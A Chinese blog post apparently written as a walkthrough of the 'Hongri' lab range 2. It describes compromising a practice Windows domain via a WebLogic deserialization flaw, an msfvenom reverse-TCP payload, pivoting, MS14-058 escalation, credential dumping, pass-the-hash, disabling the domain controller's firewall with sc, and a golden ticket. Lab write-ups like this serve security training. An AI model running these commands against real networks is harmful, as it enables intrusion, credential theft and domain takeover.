Drunkmars's Blog

红日靶场2

字数统计: 1.4k阅读时长: 5 min
2021/07/21

本文首发于先知社区:https://xz.aliyun.com/t/9851

记一次靶场渗透。

环境搭建

web:

外网ip - 192.168.10.80

内网ip - 10.10.10.80

PC:

外网ip - 192.168.10.201

内网ip - 10.10.10.201

DC:

内网ip - 10.10.10.10

web、PC、DC都处于同一域环境内,需要手动开启weblogic服务

外网

端口探测

首先nmap扫描一下端口发现了1433端口判断是sql server,另外一个特征端口就是7001端口,判断为weblogic端口

1
nmap -T4 -sC -sV 192.168.10.80

image-20210707193456627

weblogic getshell

这里访问一下weblogic所在的7001端口,注意这里直接访问7001端口会显示404,这里直接访问192.168.10.80:7001/console即可

image-20210707193541891

首先尝试一下控制台弱口令weblogic weblogic无果

image-20210707193601504

这里直接使用weblogic漏洞检测工具,也可以使用weblogic批量扫描脚本去扫描,扫描发现存在几个反序列化漏洞

image-20210707193803883

这里我是用CVE-2017-10271进行命令执行发现为administrator权限

image-20210707193824312

查看ip情况为双网卡,初步判断有域环境

image-20210707193844656

tasklist /svc查看一下进程发现了360主动防御,那么后面的马就需要做免杀处理

image-20210707193902665

这里直接使用漏扫工具中自带的jsp马先上传进行尝试

image-20210707193934151

访问一下能够访问到,那么已经上传成功

image-20210707193959396

使用蚁剑尝试连接失败,这里我觉得可能是有360的原因,而jsp的马在蚁剑默认是没有加密解密器的,所以应该是被360给拦了

image-20210707194110828

这里我换一个冰蝎的马传上去试试

image-20210707194156414

使用冰蝎连接成功

image-20210707194241888

初步做一下信息搜集,发现DNS为de1ay.com,应该这个就是域的名称

image-20210707194405981

上线msf

这里首先生成一个msf的马

1
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.30 lport=4444 -f exe > msf.exe

image-20210707194527522

使用冰蝎上传到靶机上

image-20210707194612575

执行一下,这里因为有360的原因使用msf的原生马是不能够上线的,会被360拦截

image-20210707194842917

这里我后面使用了一下混淆进行了初步免杀处理,然后上线到了msf

image-20210707195135482

内网渗透

socks代理扫描内网

这里首先添加一个10.10.10.0/24段的路由,方便后续操作

1
2
3
route add 10.10.10.0 255.255.255.0 1

route print

image-20210707195212367

使用socks路由把msf带入内网,需要在proxychains.conf里面添加路由

1
2
3
use auxiliary/server/socks4a

run

image-20210707195315930

这时候就可以使用msf中的udp_probe模块对10.10.10.0/24段的主机进行信息搜集,这里发现10段还有另外两台主机,10.10.10.10和10.10.10.201

image-20210707215623196

这里使用常规的nmap对这两个ip进行端口扫描发现什么都没有扫出来,那么这里应该是有防火墙的原因

image-20210707220400495

ms17-010

这里使用ms17-010模块首先对内网进行扫描一下能不能够通过漏洞直接进行横向移动,注意因为有360的原因这里线程不要调的太高

1
2
3
4
use auxiliary/scanner/smb/smb_ms17_010
set rhost 10.10.10.0/24
set threads 5
run

扫描完成后发现这里两台主机都可以利用永恒之蓝,就结束了(吗?)

image-20210707203431746

这里直接利用exp打一波,发现都打失败了,应该是没有开匿名管道的原因

1
2
3
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 10.10.10.80
run

image-20210707203936194

msf派生cs会话

这里我在鼓捣半天之后使用getuid查看了一下当前的权限发现还只是一个user权限,也使用不了mimikatz,因为在cs上提权比较方便,这里就直接msf派生个对话给cs,在cs上进行提权操作

使用payload-inject把msf的对话派生给msf

1
2
3
4
5
6
7
use exploit/windows/local/payload_inject
set PAYLOAD windows/meterpreter/reverse_http
set DisablePayloadHandler true
set LHOST 192.168.1.5
set LPORT 5555
set SESSION 2
run

image-20210707211428347

这里在cs创建一个监听host为192.168.1.5,port为5555接受msf的对话

image-20210707211432290

查看下内网ip的信息,dns为10.10.10.10,那么10.10.10.10大概率为域控

image-20210707221739681

查看一下主机信息,证实了猜想

1
net computers

image-20210707221926832

权限提升

这里因为是一个user权限首先要进行提权操作,使用systeminfo查看补丁情况发现只打了3个补丁,那么可以提权的exp有很多

image-20210707212821344

这里使用ms14-058直接提权到system

image-20210707212907721

使用logonpasswords导出密码

image-20210707213444768

看到这里有一个SID为500的域管的帐号,那么直接可以用psexec进行hash传递横向移动

image-20210707213513490

横向移动

这里首先扫描一下网段下的主机

image-20210707215226861

和基本判断的一致,内网下有3台主机

image-20210707222112599

这里使用80主机进行psexec操作

image-20210707222133082

这里psexec执行了但是没有主机上线,这里想起来psexec是需要在防火墙关闭的情况下才能够进行pth的,所以这里尝试一下先ipc连接关闭防火墙后再进行psexec横向移动

image-20210707222309401

使用ipc与10.10.10.10进行连接

1
2
shell net use \\10.10.10.10\ipc$ 1qaz@WSX /user:Administrator
shell net use

image-20210707222548552

使用sc创建计划任务立即执行关闭域控防火墙

1
2
sc \\10.10.10.10 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"    
sc \\10.10.10.10 start unablefirewall

这里关闭之后psexec还是没有成功,是因为这里DC只有内网ip,所以这里需要用到web进行中转操作才能够上线cs

image-20210707222553760

这里我用到cs的smb beacon进行流量中转,首先建立监听一个smb beacon

image-20210707223442558

再使用smb beacon进行psexec

image-20210707223341691

即可上线DC

image-20210707223421795

这里因为拿到了域管的帐号,这里也使用psexec的方式上线cs,这里当时可以使用批量pth进行上线

image-20210707223656487

上线成功

image-20210707224258327

权限维持

这里使用到金票进行权限维持

首先hashdump出krbtgt的hash值

image-20210707224414333

查看一下SID

image-20210707224512621

在web主机上生成金票

image-20210707224936180

可以看到这里dir域控c盘成功

image-20210707225039985

CATALOG
  1. 1. 环境搭建
  2. 2. 外网
    1. 2.1. 端口探测
    2. 2.2. weblogic getshell
    3. 2.3. 上线msf
  3. 3. 内网渗透
    1. 3.1. socks代理扫描内网
    2. 3.2. ms17-010
    3. 3.3. msf派生cs会话
    4. 3.4. 权限提升
    5. 3.5. 横向移动
  4. 4. 权限维持